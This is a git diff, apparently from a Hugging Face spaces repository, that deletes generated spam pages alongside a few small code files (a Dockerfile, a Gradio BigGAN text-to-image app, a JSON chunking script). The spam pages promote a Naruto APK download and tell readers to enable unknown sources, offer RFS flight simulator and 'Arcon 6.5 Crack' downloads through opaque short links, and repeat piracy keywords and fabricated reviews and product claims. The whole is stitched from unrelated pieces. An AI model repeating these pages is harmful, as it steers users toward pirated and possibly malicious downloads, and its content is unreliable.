      -how to install ultimate shippuden ninja impact storm apk on android
      -naruto ultimate ninja storm 5 apk obb data download for android
      -ultimate shippuden ninja impact storm apk mod unlimited money
      -naruto shippuden ultimate ninja storm 5 ppsspp iso download android
      -naruto ultimate storm apk gameplay and features review
      -ultimate shippuden ninja impact storm apk cheats and tips
      -naruto ultimate ninja storm 5 v2 0 apk requirements and compatibility
      -ultimate shippuden ninja impact storm apk best characters and skills
      -naruto shippuden ultimate ninja storm 5 android download apkpure
      -naruto ultimate storm apk download for windows 10 and macos
      -ultimate shippuden ninja impact storm apk download for ios and iphone
      -naruto ultimate ninja storm 5 v2 0 apk online multiplayer mode
      -ultimate shippuden ninja impact storm apk offline story mode
      -naruto shippuden ultimate ninja storm 5 mod apk rexdl
      -naruto ultimate storm apk graphics and sound quality comparison
      -ultimate shippuden ninja impact storm apk size and version information
      -naruto ultimate ninja storm 5 v2 0 apk new characters and costumes
      -ultimate shippuden ninja impact storm apk ratings and reviews by users
      -naruto shippuden ultimate ninja storm 5 android emulator for pc
      -naruto ultimate storm apk bugs and issues fix guide

      -

      Huge roster of characters and customization options

      -

      The game has a huge roster of characters that you can choose from, including Naruto, Sasuke, Sakura, Kakashi, Gaara, Itachi, Madara, Obito, Minato, Hinata, Boruto, Sarada, Mitsuki, and many more. You can also unlock and play as some of the legendary characters from the series, such as Hashirama, Tobirama, Hiruzen, Jiraiya, Tsunade, Orochimaru, and more. You can also customize your characters with various outfits, accessories, weapons, and items that you can obtain from the game or purchase with in-game currency.

      -

      Online multiplayer and co-op missions

      -

      The game also supports online multiplayer and co-op missions that you can play with your friends or other players around the world. You can join or create a lobby and invite up to three other players to join you in a team battle or a co-op mission. You can also chat with your teammates and communicate with them using voice chat or text chat. You can also compete with other players in ranked matches and leaderboards.

      -

      How to download and install Naruto Ultimate Ninja Storm 5 APK on your Android device

      -

      If you want to download and install Naruto Ultimate Ninja Storm 5 APK on your Android device, you need to follow these simple steps:

      -

      Step 1: Enable unknown sources on your device

      -

      Before you can install any APK file on your device, you need to enable unknown sources on your device. This will allow you to install apps from sources other than the Google Play Store. To do this, go to your device settings and look for security or privacy options. Then, find the option that says unknown sources or allow installation from unknown sources and enable it.

      -

      Step 2: Download the APK file from a trusted source

      -

      Next, you need to download the APK file of Naruto Ultimate Ninja Storm 5 from a trusted source. You can use the link provided below to download the file safely and securely. The file size is about 1.2 GB, so make sure you have enough space on your device and a stable internet connection.

      -

      Download Naruto Ultimate Ninja Storm 5 APK V2.0

      -

      Step 3: Locate and install the APK file on your device

      -

      After you have downloaded the APK file, you need to locate it on your device and install it. You can use any file manager app to find the file in your downloads folder or wherever you saved it. Then, tap on the file and follow the instructions on the screen to install it.

      -

      Step 4: Launch the game and enjoy

      -

      Once you have installed the game successfully, you can launch it from your app drawer or home screen. You may need to grant some permissions to the game for it to run properly. Then, you can enjoy playing Naruto Ultimate Ninja Storm 5 on your Android device.

      -

      Conclusion

      -

      Naruto Ultimate Ninja Storm 5 is a fantastic game that will satisfy any Naruto fan or anime lover. It has amazing graphics and animations, epic battles and gameplay modes, huge roster of characters and customization options, online multiplayer and co-op missions, and more. It is also easy to download and install on your Android device using Naruto Ultimate Ninja Storm 5 APK. So what are you waiting for? Download Naruto Ultimate Ninja Storm 5 APK now and experience the ultimate ninja adventure.

      -

      FAQs

      -

      Here are some of the frequently asked questions about Naruto Ultimate Ninja Storm 5 APK:

      -
        -
      • Is Naruto Ultimate Ninja Storm 5 APK safe to download?
      • -
      • Yes, Naruto Ultimate Ninja Storm 5 APK is safe to download as long as you use a trusted source like the one we provided above. The file is free from any viruses or malware that could harm your device.
      • -
      • Is Naruto Ultimate Ninja Storm 5 APK compatible with my device?
      • -
      • Naruto Ultimate Ninja Storm 5 APK is compatible with most Android devices that run on Android 4.4 or higher. However, some devices may not support some features or functions of the game due to hardware limitations or software issues . You can check the compatibility of your device by visiting the official website of the game or contacting the developer.
      • -
      • How can I update Naruto Ultimate Ninja Storm 5 APK?
      • -
      • You can update Naruto Ultimate Ninja Storm 5 APK by downloading and installing the latest version of the file from the same source you used before. You don't need to uninstall the previous version, as the new version will overwrite it. You can also check for updates from within the game settings.
      • -
      • Can I play Naruto Ultimate Ninja Storm 5 APK with a controller?
      • -
      • Yes, you can play Naruto Ultimate Ninja Storm 5 APK with a controller if your device supports it. You can connect your controller via Bluetooth or USB and configure the buttons and settings in the game options. You can also use an emulator app to play the game with a controller on your PC.
      • -
      • Can I play Naruto Ultimate Ninja Storm 5 APK with my friends?
      • -
      • Yes, you can play Naruto Ultimate Ninja Storm 5 APK with your friends online or offline. You can join or create a lobby and invite your friends to play with you in a team battle or a co-op mission. You can also play against your friends in a free battle mode or a tournament mode. You can also chat with your friends using voice chat or text chat.
      • -

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Experience the thrill of flying with RFS - Real Flight Simulator download pesawat now!.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Experience the thrill of flying with RFS - Real Flight Simulator download pesawat now!.md deleted file mode 100644 index cd3db7c4166321357ec6bbc3e6fe11ce0ad76c2b..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Experience the thrill of flying with RFS - Real Flight Simulator download pesawat now!.md +++ /dev/null @@ -1,178 +0,0 @@ -
      -

      How to Download Pesawat RFS Real Flight Simulator and Enjoy Its Amazing Features

      -

      If you are a fan of flight simulation games, you might have heard of Pesawat RFS Real Flight Simulator, a popular and realistic game that lets you fly in any part of the world and explore sceneries and airports in high resolution. In this article, we will show you how to download Pesawat RFS Real Flight Simulator on your device, and what are the features and reviews of this game.

      -

      download pesawat rfs real flight simulator


      Download File ••• https://ssurll.com/2uNXEa



      -

      What is Pesawat RFS Real Flight Simulator?

      -

      Pesawat RFS Real Flight Simulator is a flight simulator game developed by RORTOS, an Italian company that specializes in creating simulation games for mobile devices. The game was released in 2019 and has since gained a lot of popularity among flight enthusiasts and gamers alike.

      -

      A realistic and multiplayer flight simulator game

      -

      Pesawat RFS Real Flight Simulator is not just a game, but a simulation of real flying. You can choose from a variety of aircraft, from small planes to large jets, and fly them in different weather conditions, day and night cycles, and realistic physics. You can also interact with other pilots and air traffic controllers, chat with them, and join them in multiplayer mode.

      -

      A variety of aircraft, airports, and flight scenarios

      -

      Pesawat RFS Real Flight Simulator offers you a wide range of options to customize your flying experience. You can access thousands of community created liveries, or create your own, and apply them to your aircraft. You can also choose from over 35 HD airports, or over 14,000 LD airports (pro only), that are built down to the finest detail, with 3D buildings, vehicles, taxiways, runways, procedures, and air traffic. You can also fly in different regions of the world, from Europe to Asia, from America to Africa, and enjoy the satellite maps and heightmaps that provide high definition terrains.

      -

      A pro subscription with more benefits and options

      -

      Pesawat RFS Real Flight Simulator is free to download and play, but you can also upgrade to a pro subscription that gives you more benefits and options. With a pro subscription, you can access real time flights that are based on real data from over 40,000 flights every day. You can also create advanced flight plans with procedures for departure, arrival, approach, and transition. You can also use the ATC air traffic control feature that allows you to communicate with interactive multi voice ATC controllers. Moreover, you can enjoy the satellite terrain and heightmap features that provide high definition worldwide terrains (satellite data requires online connection to stream data).

      -

      download pesawat rfs real flight simulator mod apk
      -download pesawat rfs real flight simulator for pc
      -download pesawat rfs real flight simulator pro
      -download pesawat rfs real flight simulator gratis
      -download pesawat rfs real flight simulator terbaru
      -download pesawat rfs real flight simulator offline
      -download pesawat rfs real flight simulator full version
      -download pesawat rfs real flight simulator android
      -download pesawat rfs real flight simulator online
      -download pesawat rfs real flight simulator free
      -download pesawat rfs real flight simulator hack
      -download pesawat rfs real flight simulator update
      -download pesawat rfs real flight simulator unlimited money
      -download pesawat rfs real flight simulator premium
      -download pesawat rfs real flight simulator apk data
      -download pesawat rfs real flight simulator apk obb
      -download pesawat rfs real flight simulator latest version
      -download pesawat rfs real flight simulator unlocked
      -download pesawat rfs real flight simulator apk pure
      -download pesawat rfs real flight simulator mod menu
      -download pesawat rfs real flight simulator cheat
      -download pesawat rfs real flight simulator cracked
      -download pesawat rfs real flight simulator apk mod
      -download pesawat rfs real flight simulator windows 10
      -download pesawat rfs real flight simulator ios
      -download pesawat rfs real flight simulator mac
      -download pesawat rfs real flight simulator laptop
      -download pesawat rfs real flight simulator google play
      -download pesawat rfs real flight simulator bluestacks
      -download pesawat rfs real flight simulator review
      -download pesawat rfs real flight simulator gameplay
      -download pesawat rfs real flight simulator tips and tricks
      -download pesawat rfs real flight simulator liveries
      -download pesawat rfs real flight simulator multiplayer
      -download pesawat rfs real flight simulator tutorial
      -download pesawat rfs real flight simulator wiki
      -download pesawat rfs real flight simulator guide
      -download pesawat rfs real flight simulator features
      -download pesawat rfs real flight simulator system requirements
      -download pesawat rfs real flight simulator best settings
      -download pesawat rfs real flight simulator how to play
      -download pesawat rfs real flight simulator controls
      -download pesawat rfs real flight simulator cockpit view
      -download pesawat rfs real flight simulator atc voice
      -download pesawat rfs real flight simulator weather settings
      -download pesawat rfs real flight simulator realistic mode
      -download pesawat rfs real flight simulator custom planes
      -download pesawat rfs real flight simulator hd graphics

      -

      How to Download Pesawat RFS Real Flight Simulator on Your Device?

      -

      Pesawat RFS Real Flight Simulator is available for Android, iOS, and PC devices. Here are the steps to download it on your device:

      -

      For Android users

      -

      If you have an Android device, you can download Pesawat RFS Real Flight Simulator from the Google Play Store. Here are the steps:

      -
        -
      1. Open the Google Play Store app on your device.
      2. -
      3. Search for Pesawat RFS Real Flight Simulator in the search bar.
      4. -
      5. Select the game from the list of results and tap on Install.
      6. -
      7. Wait for the game to download and install on your device.
      8. -
      9. Open the game and enjoy flying.
      10. -
      -

      For iOS users

      -

      If you have an iOS device, you can download Pesawat RFS Real Flight Simulator from the App Store. Here are the steps:

      -
        -
      1. Open the App Store app on your device.
      2. -
      3. Search for Pesawat RFS Real Flight Simulator in the search bar.
      4. -
      5. Select the game from the list of results and tap on Get.
      6. -
      7. Enter your Apple ID password or use Touch ID or Face ID to confirm the download.
      8. -
      9. Wait for the game to download and install on your device.
      10. -
      11. Open the game and enjoy flying.
      12. -
      -

      For PC users

      -

      If you have a PC, you can download Pesawat RFS Real Flight Simulator from the Microsoft Store. Here are the steps:

      -
        -
      1. Open the Microsoft Store app on your PC.
      2. -
      3. Search for Pesawat RFS Real Flight Simulator in the search bar.
      4. -
      5. Select the game from the list of results and click on Get.
      6. -
      7. Sign in with your Microsoft account if prompted.
      8. -
      9. Wait for the game to download and install on your PC.
      10. -
      11. Open the game and enjoy flying.
      12. -
      -

      What are the Features of Pesawat RFS Real Flight Simulator?

      -

      Pesawat RFS Real Flight Simulator is a game that offers you a lot of features to make your flying experience more realistic and enjoyable. Here are some of the features that you can find in this game:

      -

      Advanced multi panel system and customizable instruments

      -

      Pesawat RFS Real Flight Simulator allows you to control your aircraft with an advanced multi panel system that includes navigation, engine, fuel, electrical, hydraulic, pressurization, communication, flight plan, S-TEC 55, FMS, GPS, and more. You can also customize your instruments by choosing from over 40 available panels. You can also use a joystick or a yoke to control your aircraft (PC only).

      -

      High definition satellite terrains and 3D buildings

      -

      Pesawat RFS Real Flight Simulator provides you with high definition satellite terrains that cover the whole world. You can see the details of mountains, rivers, lakes, roads, cities, and more. You can also see 3D buildings that add realism to your flights. You can adjust the level of detail and quality of the graphics according to your device's performance.

      -

      Real time flights and air traffic control

      -

      Pesawat RFS Real Flight Simulator lets you fly in real time with real flights that are based on real data from over 40,000 flights every day (pro only). You can see other planes flying around you and interact with them. You can also use the ATC air traffic control feature that allows you to communicate with interactive multi voice ATC controllers (pro only). You can request takeoff clearance, taxi instructions, landing clearance, flight information, emergency assistance, and more.

      -

      Multiplayer mode and community liveries

      -

      Pesawat RFS Real Flight Simulator enables you to fly with other pilots from around the world in multiplayer mode. You can chat with them, join them in formation flights, or challenge them in races. You can also access thousands of community created liveries, or create your own, and apply them to your aircraft. You can share your liveries with other players and download theirs as well.

      -

      Failures, weather, and flight plan options

      -

      Pesawat RFS Real Flight Simulator gives you more options to customize your flights according to your preferences and skills. You can set up different failures that affect your aircraft's performance and systems, such as engine failure, fuel leak, fire, landing gear malfunction, bird strike, etc. You can also choose from different weather conditions that affect your visibility and wind direction and speed. You can also create advanced flight plans with procedures for departure, arrival, approach, and transition (pro only).

      -

      What are the Reviews of Pesawat RFS Real Flight Simulator?

      -

      Pesawat RFS Real Flight Simulator has received a lot of reviews from users who have downloaded and played it. Here are some of the reviews that you can find on the Google Play Store, App Store, and Microsoft Store:

      -

      Positive reviews from satisfied users

      -

      Pesawat RFS Real Flight Simulator has received a lot of positive reviews from users who have enjoyed the game and its features. Here are some of the positive reviews that you can find on the Google Play Store, App Store, and Microsoft Store:

      - - - - - - - - - - - - - - - - - - - - - -
      PlatformReviewRating
      Google Play Store"This is the best flight simulator game I have ever played. The graphics are amazing, the controls are smooth, and the multiplayer mode is fun. I love the real time flights and the ATC feature. I highly recommend this game to anyone who loves flying."5 stars
      App Store"I am a real pilot and I must say this game is very realistic and accurate. The physics, the instruments, the procedures, everything is well done. The game is also very challenging and rewarding. You can learn a lot from this game."5 stars
      Microsoft Store"This game is awesome. It has everything you need to simulate a real flight. The scenery, the weather, the traffic, the failures, the liveries, the flight plans, everything. The game is also very stable and runs smoothly on my PC."5 stars
      -

      Negative reviews from disappointed users

      -

      Pesawat RFS Real Flight Simulator has also received some negative reviews from users who have encountered some issues or problems with the game. Here are some of the negative reviews that you can find on the Google Play Store, App Store, and Microsoft Store:

      - - - - - - - - - - - - - - - - - - - - - -
      PlatformReviewRating
      Google Play Store"This game is a rip off. It is too expensive to buy the pro subscription and it is not worth it. The game is full of bugs and glitches. The graphics are poor, the controls are hard, and the multiplayer mode is laggy. I regret buying this game."1 star
      App Store"This game is a waste of time and money. It crashes all the time and it does not save your progress. The game is also very boring and repetitive. There is nothing to do except flying around in circles. The game is also very unrealistic and inaccurate."1 star
      Microsoft Store"This game is a joke. It does not work on my PC at all. It freezes, crashes, and shuts down my PC every time I try to play it. The game is also very poorly optimized and requires a lot of resources to run. The game is also very outdated and lacks many features."1 star
      -

      Tips and suggestions from experienced players

      -

      Pesawat RFS Real Flight Simulator has also received some tips and suggestions from experienced players who have shared their knowledge and advice with other users. Here are some of the tips and suggestions that you can find on the Google Play Store, App Store, and Microsoft Store:

      -
        -
      • "If you want to improve your flying skills, you should watch some tutorials on YouTube or read some guides on the wiki page of the game. They will help you understand how to use the instruments, how to follow the procedures, how to communicate with ATC, etc."
      • -
      • "If you want to have more fun with the game, you should join some groups or communities on social media or Discord. They will help you find other players to fly with, share your liveries with, or join some events or challenges with."
      • -
      • "If you want to have more options with the game, you should buy the pro subscription or some in-app purchases. They will give you access to more features, such as real time flights, satellite terrains, advanced flight plans, ATC controllers, etc."
      • -
      • "If you want to have more realism with the game, you should use a joystick or a yoke to control your aircraft (PC only). They will give you more precision and feedback than using a keyboard or a mouse."
      • -
      • "If you want to have more feedback with the game, you should rate it and write a review on the store where you downloaded it. They will help the developers improve the game and fix any issues or problems that you might have."
      • -
      -

      Conclusion

      -

      Pesawat RFS Real Flight Simulator is a flight simulator game that offers you a realistic and multiplayer flying experience in any part of the world. You can download it for free on your Android, iOS, or PC device, and enjoy its amazing features, such as advanced multi panel system, high definition satellite terrains, real time flights, multiplayer mode, failures, weather, and flight plan options. You can also upgrade to a pro subscription that gives you more benefits and options, such as satellite heightmaps, real time ATC controllers, and advanced flight plans. Pesawat RFS Real Flight Simulator has received a lot of reviews from users who have shared their opinions, experiences, tips, and suggestions about the game. If you are looking for a flight simulator game that is realistic, challenging, and fun, you should try Pesawat RFS Real Flight Simulator and see for yourself.

      -

      FAQs

      -

      Here are some of the frequently asked questions about Pesawat RFS Real Flight Simulator:

      -

      Q: How much does the pro subscription cost?

      -

      A: The pro subscription costs $0.99 per week, $4.99 per month, or $49.99 per year. You can cancel it anytime you want.

      -

      Q: How can I create my own liveries?

      -

      A: You can create your own liveries by using the livery editor feature in the game. You can access it by tapping on the aircraft icon on the main menu and then tapping on the paintbrush icon. You can choose from different colors, patterns, stickers, logos, and texts to customize your aircraft.

      -

      Q: How can I join multiplayer mode?

      -

      A: You can join multiplayer mode by tapping on the multiplayer icon on the main menu and then choosing a server to join. You can also create your own server by tapping on the plus icon and setting up your own rules and options.

      -

      Q: How can I communicate with ATC controllers?

      -

      A: You can communicate with ATC controllers by using the ATC feature in the game (pro only). You can access it by tapping on the ATC icon on the top right corner of the screen and then choosing a frequency to tune in. You can then use the buttons to request or respond to ATC instructions.

      -

      Q: How can I report a bug or a problem with the game?

      -

      A: You can report a bug or a problem with the game by contacting the developers through their email address (rfs@rortos.com) or their social media accounts (Facebook, Twitter, Instagram). You can also use the feedback feature in the game by tapping on the settings icon on the main menu and then tapping on feedback.

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/skylarx2x/openai-reverse-proxy/Dockerfile b/spaces/skylarx2x/openai-reverse-proxy/Dockerfile deleted file mode 100644 index 6953fc05439efb70991552cf56f28365b5b6c15b..0000000000000000000000000000000000000000 --- a/spaces/skylarx2x/openai-reverse-proxy/Dockerfile +++ /dev/null @@ -1,11 +0,0 @@ -FROM node:18 - -WORKDIR /app - -RUN npm install express express-http-proxy - -COPY . . - -EXPOSE 7860 - -CMD [ "node", "server.js" ] \ No newline at end of file diff --git a/spaces/smangrul/Text-To-Image/app.py b/spaces/smangrul/Text-To-Image/app.py deleted file mode 100644 index 558c0a54ebc43ab69e502039dbf2019fc0bbb4ab..0000000000000000000000000000000000000000 --- a/spaces/smangrul/Text-To-Image/app.py +++ /dev/null @@ -1,114 +0,0 @@ - -import gradio as gr -import torch -from transformers import AutoModelForSequenceClassification -from transformers import AutoTokenizer -from transformers import pipeline - -import torch -import os -import numpy as np -from matplotlib import pyplot as plt -from PIL import Image - -from pytorch_pretrained_biggan import BigGAN, truncated_noise_sample, one_hot_from_names, one_hot_from_int - -config = { - "model_name": "smangrul/Multimodal-Challenge", - "base_model_name": "distilbert-base-uncased", - "image_gen_model": "biggan-deep-128", - "max_length": 20, - "freeze_text_model": True, - "freeze_image_gen_model": True, - "text_embedding_dim": 768, - "class_embedding_dim": 128 -} -truncation=0.4 - -is_gpu = False -device = torch.device('cuda') if is_gpu else torch.device('cpu') -print(device) - -model = AutoModelForSequenceClassification.from_pretrained(config["model_name"], use_auth_token=os.environ.get( - 'huggingface-api-token')) -tokenizer = AutoTokenizer.from_pretrained(config["base_model_name"]) -model.to(device) -model.eval() - -gan_model = BigGAN.from_pretrained(config["image_gen_model"]) -gan_model.to(device) -gan_model.eval() -print("Models were loaded") - - -def generate_image(dense_class_vector=None, int_index=None, noise_seed_vector=None, truncation=0.4): - seed = int(noise_seed_vector.sum().item()) if noise_seed_vector is not None else None - noise_vector = truncated_noise_sample(truncation=truncation, batch_size=1, seed=seed) - noise_vector = torch.from_numpy(noise_vector) - if int_index is not None: - class_vector = one_hot_from_int([int_index], batch_size=1) - class_vector = torch.from_numpy(class_vector) - dense_class_vector = gan_model.embeddings(class_vector) - else: - if isinstance(dense_class_vector, np.ndarray): - dense_class_vector = torch.tensor(dense_class_vector) - dense_class_vector = dense_class_vector.view(1, 128) - - input_vector = torch.cat([noise_vector, dense_class_vector], dim=1) - - # Generate an image - with torch.no_grad(): - output = gan_model.generator(input_vector, truncation) - output = output.cpu().numpy() - output = output.transpose((0, 2, 3, 1)) - output = ((output + 1.0) / 2.0) * 256 - output.clip(0, 255, out=output) - output = np.asarray(np.uint8(output[0]), dtype=np.uint8) - return output - - -def print_image(numpy_array): - """ Utility function to print a numpy uint8 array as an image - """ - img = Image.fromarray(numpy_array) - plt.imshow(img) - plt.show() - - -def text_to_image(text): - tokens = tokenizer.encode(text, add_special_tokens=True, return_tensors='pt').to(device) - with torch.no_grad(): - lm_output = model(tokens, return_dict=True) - pred_int_index = torch.argmax(lm_output.logits[0], dim=-1).cpu().detach().numpy().tolist() - print(pred_int_index) - - # Now generate an image (a numpy array) - numpy_image = generate_image(int_index=pred_int_index, - truncation=truncation, - noise_seed_vector=tokens) - - img = Image.fromarray(numpy_image) - #print_image(numpy_image) - return img - -examples = ["a high resoltuion photo of a pizza from famous food magzine.", - "this is a photo of my pet golden retriever.", - "this is a photo of a trouble some street cat.", - "a blur image of coral reef.", - "a yellow taxi cab commonly found in USA.", - "Once upon a time, there was a black ship full of pirates.", - "a photo of a large castle.", - "a sketch of an old Church"] - -if __name__ == '__main__': - interFace = gr.Interface(fn=text_to_image, - inputs=gr.inputs.Textbox(placeholder="Enter the text to generate an image", label="Text " - "query", - lines=1), - outputs=gr.outputs.Image(type="auto", label="Generated Image"), - verbose=True, - examples=examples, - title="Generate Image from Text", - description="", - theme="huggingface") - interFace.launch() diff --git a/spaces/srikanth-nm/ai_seeker/chunks_create.py b/spaces/srikanth-nm/ai_seeker/chunks_create.py deleted file mode 100644 index cfab2a521592bd1cb38e421f7bcf73af0b13b769..0000000000000000000000000000000000000000 --- a/spaces/srikanth-nm/ai_seeker/chunks_create.py +++ /dev/null @@ -1,44 +0,0 @@ -import json - -def combine_and_calculate(input_file_path, output_file_path): - with open(input_file_path, 'r') as file: - output_data = json.load(file) - - combined_json_list = [] - - # Calculate the number of groups to create - num_groups = (len(output_data) + 7) // 8 - - for group_num in range(num_groups): - # Calculate the starting index and ending index for the current group - start_index = group_num * 8 - end_index = min(start_index + 8, len(output_data)) - - # Extract the "text" values from the current group of dictionaries - combined_text = " ".join([item["text"] for item in output_data[start_index:end_index]]) - - # Calculate the "start" and "end" for the current group - group_start = output_data[start_index]["start"] - group_end = output_data[end_index - 1]["end"] - - # Create the combined JSON for the current group - combined_json = { - "text": combined_text, - "start": group_start, - "end": group_end, - } - - combined_json_list.append(combined_json) - - # Save the combined JSON list to a new file - with open(output_file_path, 'w') as output_file: - json.dump(combined_json_list, output_file) - -# Replace 'output_file.json' with the path to the output JSON file you created previously -input_file_path = '/home/bharathi/langchain_experiments/GenAI/transcript_end.json' - -# Replace 'combined_output_file.json' with the desired path and filename for the combined JSON file -output_file_path = '/home/bharathi/langchain_experiments/GenAI/chunks.json' - -# Call the function to create the combined JSON and save it to a new file -combine_and_calculate(input_file_path, output_file_path) diff --git a/spaces/sriramelango/Social_Classification_Public/fairseq/tests/__init__.py b/spaces/sriramelango/Social_Classification_Public/fairseq/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/stomexserde/gpt4-ui/Examples/Arcon 6.5 [CRACKED] Crack.md b/spaces/stomexserde/gpt4-ui/Examples/Arcon 6.5 [CRACKED] Crack.md deleted file mode 100644 index 63a7f74515c7055bf447b4b91ab8e273e2c31868..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Arcon 6.5 [CRACKED] Crack.md +++ /dev/null @@ -1,162 +0,0 @@ - -

      Arcon 6.5 Crack: What You Need to Know Before Downloading

      -

      If you are looking for a powerful and versatile software for architectural design, 3D modeling, and rendering, you may have heard of Arcon 6.5. Arcon 6.5 is a software that allows you to create realistic and detailed architectural projects, from floor plans and elevations to 3D views and animations. Arcon 6.5 is compatible with various CAD and BIM formats, such as DWG, DXF, SKP, IFC, and more. Arcon 6.5 also has a large library of objects, materials, textures, and lighting effects that you can use to customize your designs.

      -

      However, Arcon 6.5 is not a cheap software. The full version of Arcon 6.5 costs around $1,000 USD, which may be too expensive for some users. Moreover, the trial version of Arcon 6.5 has many limitations, such as a limited number of objects, a watermark on the output, and a 30-day expiration date. Therefore, some people may be tempted to look for a cracked version of Arcon 6.5 online, hoping to get the full features and benefits of the software without paying for it.

      -

      Arcon 6.5 Crack


      DOWNLOAD ->>->>->> https://urlgoal.com/2uI6Aj



      -

      But is downloading Arcon 6.5 crack a good idea? What are the risks and benefits of using a cracked version of Arcon 6.5? In this article, we will answer these questions and help you decide whether to download Arcon 6.5 crack or not.

      -

      What is Arcon 6.5?

      -

      Arcon 6.5 is a software developed by Elecosoft, a company that specializes in software solutions for the construction industry. Arcon 6.5 is part of the Arcon Evo series, which is the latest generation of Arcon software.

      -

      Arcon 6.5 is designed to help architects, designers, builders, and homeowners create stunning architectural projects with ease and accuracy. Arcon 6.5 has many features and functions that make it a powerful and versatile software, such as:

      -
        -
      • A user-friendly interface that allows you to work in 2D or 3D mode
      • -
      • A smart drawing tool that automatically generates walls, doors, windows, roofs, stairs, and other elements
      • -
      • A dynamic editing tool that lets you modify your design in real-time
      • -
      • A comprehensive object library that contains over 8,000 objects, such as furniture, fixtures, appliances, plants, vehicles, and more
      • -
      • A realistic rendering engine that produces high-quality images and animations with shadows, reflections, textures, and lighting effects
      • -
      • A flexible export and import function that supports various CAD and BIM formats, such as DWG, DXF, SKP, IFC, PDF, JPG, BMP, and more
      • -
      • A collaboration feature that allows you to share your projects with other users or clients via email or cloud storage
      • -
      -

      With Arcon 6.5, you can create any type of architectural project, from residential to commercial, from interior to exterior, from simple to complex. You can also customize your design according to your preferences and requirements.

      -

      Why do people want to crack Arcon 6.5?

      -

      As mentioned earlier, Arcon 6.5 is not a cheap software. The full version of Arcon 6.5 costs around $1,000 USD, which may be too expensive for some users who want to use the software for personal or professional purposes.

      -

      Moreover, the trial version of Arcon 6.5 has many limitations that prevent users from fully experiencing the features and functions of the software. For example:

      -

      -
        -
      • The trial version only allows you to use up to 50 objects in your project
      • -
      • The trial version adds a watermark on your output files
      • -
      • The trial version expires after 30 days of use
      • -
      • The trial version does not include all the features and updates of the full version
      • -
      -

      Therefore, some people may want to crack Arcon 6.5 in order to bypass the license and activation process of the software and use it without paying for it or having any restrictions.

      -

      The high cost of Arcon 6.5 license

      -

      One of the main reasons why people want to crack Arcon 6.5 is the high cost of the license fee for the full version of the software. As mentioned earlier, the full version of Arcon 6.5 costs around $1,000 USD, which is a significant amount of money for many users. Especially if they only need to use the software for a short-term project or a one-time purpose, they may not want to invest that much money on a software license.

      -

      Moreover, Arcon 6.5 is not the only software that offers architectural design, 3D modeling, and rendering features. There are other similar software that are cheaper or even free to use, such as SketchUp, Blender, AutoCAD, Revit, and more. Therefore, some users may think that Arcon 6.5 is overpriced and not worth paying for.

      -

      For example, SketchUp is a popular software that allows users to create 3D models of anything, from buildings and furniture to landscapes and vehicles. SketchUp has a free version that can be used for personal projects and a pro version that costs $299 USD per year for professional use. SketchUp also has a large community of users who share their models and resources online. SketchUp is compatible with various CAD and BIM formats, such as DWG, DXF, SKP, IFC, and more.

      -

      Blender is another popular software that is used for creating 3D models, animations, visual effects, and games. Blender is completely free and open source, meaning that anyone can download, use, modify, and distribute it without any restrictions. Blender has a powerful rendering engine that can produce realistic images and videos with advanced features such as ray tracing, volumetrics, motion blur, and more. Blender also has a large community of users who contribute to the development and improvement of the software.

      -

      AutoCAD is one of the most widely used software for CAD and BIM applications. AutoCAD allows users to create 2D drawings and 3D models of various types of projects, such as architecture, engineering, construction, manufacturing, and more. AutoCAD has a subscription-based pricing model that costs $210 USD per month or $1,690 USD per year for individual use. AutoCAD also has a free trial version that lasts for 30 days.

      -

      Revit is another software that is used for CAD and BIM applications. Revit allows users to create 3D models of buildings and structures that are integrated with information such as materials, dimensions, schedules, costs, and more. Revit also has a subscription-based pricing model that costs $280 USD per month or $2,250 USD per year for individual use. Revit also has a free trial version that lasts for 30 days.

      -

      As you can see, there are many alternatives to Arcon 6.5 that are cheaper or free to use. Therefore, some users may prefer to use these software instead of paying for Arcon 6.5 license.

      -

      The limited availability of Arcon 6.5 trial version

      -

      Another reason why people want to crack Arcon 6.5 is the limited availability of the trial version of the software. As mentioned earlier, the trial version of Arcon 6.5 has many limitations that prevent users from fully experiencing the features and functions of the software. For example, the trial version only allows users to use up to 50 objects in their project, adds a watermark on their output files, expires after 30 days of use, and does not include all the features and updates of the full version.

      -

      Therefore, some users may feel frustrated and dissatisfied with the trial version of Arcon 6.5 and want to crack the software in order to get unlimited access to all the features and functions of the software. They may think that the trial version does not give them enough time or opportunity to test and evaluate the software before deciding whether to buy it or not.

      -

      Moreover, some users may have difficulty finding or downloading the trial version of Arcon 6.5 online. The official website of Arcon 6.5 does not provide a direct link to download the trial version of the software. Instead, users have to fill out a form with their personal and professional details and wait for an email from Elecosoft with a download link and an activation code. This process may take some time and effort, and some users may not receive the email or the link may not work properly.

      -

      Therefore, some users may look for alternative ways to download Arcon 6.5 online, such as torrent sites, file-sharing platforms, or crack websites. These sources may claim to offer a cracked version of Arcon 6.5 that does not require any license or activation and can be used without any limitations.

      -

      The desire to access all features and updates of Arcon 6.5

      -

      A third reason why people want to crack Arcon 6.5 is the desire to access all features and updates of the software. As mentioned earlier, Arcon 6.5 has many features and functions that make it a powerful and versatile software for architectural design, 3D modeling, and rendering.

      -

      However, not all features and functions are available in the trial version or the older versions of Arcon 6.5. Some features and updates are exclusive to the full version or the latest version of Arcon 6.5, such as:

      -
        -
      • A new user interface that is more intuitive and user-friendly
      • -
      • A new drawing tool that allows users to create curved walls, sloped roofs, complex shapes, and more
      • -
      • A new rendering engine that supports ray tracing, global illumination, ambient occlusion, depth of field, and more
      • -
      • A new export and import function that supports more CAD and BIM formats, such as OBJ, STL, VRML, DAE, KMZ, and more
      • -
      • A new collaboration feature that allows users to work on projects with other users in real-time via cloud storage
      • -
      -

      These features and updates can enhance the quality and performance of Arcon 6.5 and provide users with more options and possibilities for their projects. Therefore, some users may want to crack Arcon 6.5 in order to access all features and updates of the software without paying for them or waiting for them.

      -

      What are the risks and benefits of using a cracked version of Arcon 6.5?

      -

      Now that we have discussed why people want to crack Arcon 6.5, let us examine what are the risks and benefits of using a cracked version of Arcon 6.5.

      -

